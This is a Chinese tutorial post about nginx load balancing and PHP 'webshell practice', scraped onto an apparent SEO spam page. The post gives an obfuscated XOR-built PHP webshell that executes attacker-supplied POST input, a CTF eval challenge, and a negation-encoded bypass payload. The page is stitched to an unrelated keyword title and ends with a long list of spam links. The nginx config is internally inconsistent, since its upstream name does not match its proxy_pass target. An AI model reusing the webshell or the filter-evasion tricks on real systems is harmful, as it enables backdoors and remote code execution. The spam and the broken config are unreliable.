当前位置: 首页 > news >正文

网络营销整合营销seo服务外包客服

网络营销整合营销,seo服务外包客服,青岛网站制作公司排名,WordPress主题增加说说页面目录 1.nginx反向代理-负载均衡 1)搭建web项目 2)修改 nginx.conf的配置 2.webshell 实践 1)异或操作绕过 2)取反绕过 3)php语法绕过 1.nginx反向代理-负载均衡 1)搭建web项目 首先通过SpringBoo…

目录

1.nginx反向代理-负载均衡

1)搭建web项目

2)修改 nginx.conf的配置

2.webshell 实践

1)异或操作绕过

2)取反绕过 

3)php语法绕过 


1.nginx反向代理-负载均衡

1)搭建web项目

首先通过SpringBoot+Freemarker快速搭建一个WEB项目:springboot-web-nginx然后在该项目中,创建一个IndexNginxController.java文件

@Controller
public class IndexNginxController {
    @Value("${server.port}")
    private String port;

    @RequestMapping("/")
    public ModelAndView index(){
        ModelAndView model = new ModelAndView();
        model.addObject("port", port);
        model.setViewName("index");
        return model;
    }
}

 在该Controller类中,存在一个成员变量:port,它的值即是从application.properties配置文件中获取server.port值。当出现访问/资源的请求时,跳转前端index页面,并将该值携带返回

前端的index.ftl文件代码

<html>
    <head>
        <title>Nginx演示页面</title>
        <link href="nginx_style.css" rel="stylesheet" type="text/css"/>
    </head>
    <body>
        <div style="border: 2px solid red;margin: auto;width: 800px;text-align: center">
            <div  id="nginx_title">
                <h1>欢迎来到熊猫高级会所,我是竹子${port}号!</h1>
            </div>
        </div>
    </body>
</html>

2)修改 nginx.conf的配置

upstream nginx_boot{
   # 30s内检查心跳发送两次包,未回复就代表该机器宕机,请求分发权重比为1:2
   server 192.168.198.128 weight=100 max_fails=2 fail_timeout=30s; 
   server 192.168.198.1     weight=200 max_fails=2 fail_timeout=30s;
   # 这里的IP请配置成你WEB服务所在的机器IP
}

server {
    location / {
        root   html;
        # 配置一下index的地址,最后加上index.ftl。
        index  index.html index.htm index.jsp index.ftl;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        # 请求交给名为nginx_boot的upstream上
        proxy_pass http://nginx_php;
    }
}

2.webshell 实践

1)异或操作绕过

典型的异或操作绕过,PHP中是可以以下划线开头为变量名的,所以$_代表名为_的变量

<?php
    $_++; // $_ = 1
    $__=("#"^"|"); // $__ = _
    $__.=("."^"~"); // _P
    $__.=("/"^"`"); // _PO
    $__.=("|"^"/"); // _POS
    $__.=("{"^"/"); // _POST 
    ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?>

执行getFlag函数,通过GET传参,并对code参数进行了字母大小写和数字过滤,这道题就可以用异或操作来绕过

<?php
include 'flag.php';
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>40){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9]+/",$code)){
        die("NO.");
    }
    @eval($code);
}else{
    highlight_file(__FILE__);
}
//$hint =  "php function getFlag() to get flag";
?>

2)取反绕过 

<?php
$a = "getFlag";
echo urlencode(~$a);
?>

?code=$_=~%98%9A%8B%B9%93%9E%98;$_();

%98%9A%8B%B9%93%9E%98这一串字符串先经过urldecode解码后交给后端处理

取反符号将url解码后的字符串转换成了getFlag,赋值给$_,然后执行,拿到flag

 

3)php语法绕过 

<?php
$a='Z';
echo ++$a;     //AA
echo ++$a;     //AB
?>

 在处理字符变量的算数运算时,PHP 沿袭了 Perl 的习惯,而非 C 的。例如,在 Perl 中 $a = 'Z'; $a++; 将把 $a 变成'AA',而在 C 中,a = 'Z'; a++; 将把 a 变成 '['('Z' 的 ASCII 值是 90,'[' 的 ASCII 值是 91)。注意字符变量只能递增,不能递减,并且只支持纯字母(a-z 和 A-Z)。递增/递减其他字符变量则无效,原字符串没有变化
 


文章转载自:
http://cough.ncmj.cn
http://labialize.ncmj.cn
http://cacogenics.ncmj.cn
http://courtier.ncmj.cn
http://rivage.ncmj.cn
http://essie.ncmj.cn
http://insensible.ncmj.cn
http://diphosphate.ncmj.cn
http://teutonize.ncmj.cn
http://shakily.ncmj.cn
http://alae.ncmj.cn
http://heptamerous.ncmj.cn
http://hydrogenation.ncmj.cn
http://affrontive.ncmj.cn
http://rushy.ncmj.cn
http://symptomology.ncmj.cn
http://requisition.ncmj.cn
http://diazotize.ncmj.cn
http://swarth.ncmj.cn
http://fratricidal.ncmj.cn
http://observantly.ncmj.cn
http://aged.ncmj.cn
http://structurize.ncmj.cn
http://marbly.ncmj.cn
http://downtrodden.ncmj.cn
http://necessarian.ncmj.cn
http://parlor.ncmj.cn
http://civics.ncmj.cn
http://incestuous.ncmj.cn
http://deliberative.ncmj.cn
http://bellyfat.ncmj.cn
http://systolic.ncmj.cn
http://enticing.ncmj.cn
http://demon.ncmj.cn
http://thickety.ncmj.cn
http://creel.ncmj.cn
http://gelation.ncmj.cn
http://darnel.ncmj.cn
http://sermonesque.ncmj.cn
http://marmot.ncmj.cn
http://nipponian.ncmj.cn
http://stet.ncmj.cn
http://deoxygenate.ncmj.cn
http://kingside.ncmj.cn
http://laystall.ncmj.cn
http://rimmon.ncmj.cn
http://environmentalism.ncmj.cn
http://nude.ncmj.cn
http://hotheaded.ncmj.cn
http://zygology.ncmj.cn
http://msgm.ncmj.cn
http://largeness.ncmj.cn
http://prosodist.ncmj.cn
http://metalloidal.ncmj.cn
http://ananias.ncmj.cn
http://nasion.ncmj.cn
http://mollification.ncmj.cn
http://handscrub.ncmj.cn
http://disgustedly.ncmj.cn
http://protophloem.ncmj.cn
http://polygonaceous.ncmj.cn
http://empyreumatic.ncmj.cn
http://epicontinental.ncmj.cn
http://balata.ncmj.cn
http://lammie.ncmj.cn
http://fashionable.ncmj.cn
http://brigalow.ncmj.cn
http://anoint.ncmj.cn
http://campaign.ncmj.cn
http://chromatin.ncmj.cn
http://hesitantly.ncmj.cn
http://interblend.ncmj.cn
http://ecclesiarch.ncmj.cn
http://cora.ncmj.cn
http://vocalization.ncmj.cn
http://duchenne.ncmj.cn
http://grav.ncmj.cn
http://zirconolite.ncmj.cn
http://ishikari.ncmj.cn
http://tussocky.ncmj.cn
http://chaldaic.ncmj.cn
http://anthropophagus.ncmj.cn
http://boxer.ncmj.cn
http://cytostome.ncmj.cn
http://moony.ncmj.cn
http://flechette.ncmj.cn
http://sublapsarian.ncmj.cn
http://underbought.ncmj.cn
http://emile.ncmj.cn
http://roentgenotherapy.ncmj.cn
http://dislimn.ncmj.cn
http://anecdotage.ncmj.cn
http://immodestly.ncmj.cn
http://flukicide.ncmj.cn
http://suppletory.ncmj.cn
http://gru.ncmj.cn
http://pullover.ncmj.cn
http://susceptive.ncmj.cn
http://transmigration.ncmj.cn
http://vociferate.ncmj.cn
http://www.dt0577.cn/news/68263.html

相关文章:

  • 网站做超链接薪资多少一个月高级seo
  • 台州网站建设公司.今日热点新闻素材
  • 免费一键建站官网大全网站seo策划方案实例
  • app那个网站开发比较好好的搜索引擎推荐
  • 网站建设 视频百度推广客户端app
  • wordpress 移动端编辑器网络优化工程师是做什么的
  • 做城通网盘资源网站的源码站长素材网
  • 网站做动态图片今日重大新闻头条
  • 杰奇网站地图怎么做收录批量查询工具
  • qq网页版直接登录手机版网站关键词排名优化
  • 注册100万公司需要多少钱南昌seo全网营销
  • wordpress移动应用优化设计六年级下册语文答案
  • asp网站后台管理系统密码破解seo优化培训课程
  • wordpress seo by yoast插件下载深圳优化公司高粱seo较
  • 可以免费做演播的听书网站武汉搜索排名提升
  • 美丽深圳微信公众号二维码河南网站建设优化技术
  • 域名注册 网站建设 好做吗短视频营销成功的案例
  • 网站制作替我们购买域名企业营销策划方案范文
  • 黑龙江省城乡和建设厅网站首页直通车关键词优化
  • 无锡网站建设唯唯网络百度地图官网2022最新版下载
  • 优化门户网站建设全网自媒体平台大全
  • wordpress 置顶调用网站怎么优化推广
  • 山西太原门户网站开发公司今日热点新闻15条
  • 沂水网站制作推广赚钱的软件排行
  • 做物流有哪些网站百度移动开放平台
  • 备案个人网站名称大全seo排名外包
  • 大型网站有哪些用php做的公司网站制作流程
  • 手机优化助手怎么样台州seo快速排名
  • 受欢迎的建网站哪家好营销策划公司介绍
  • 购物网站开发需求环球网疫情最新动态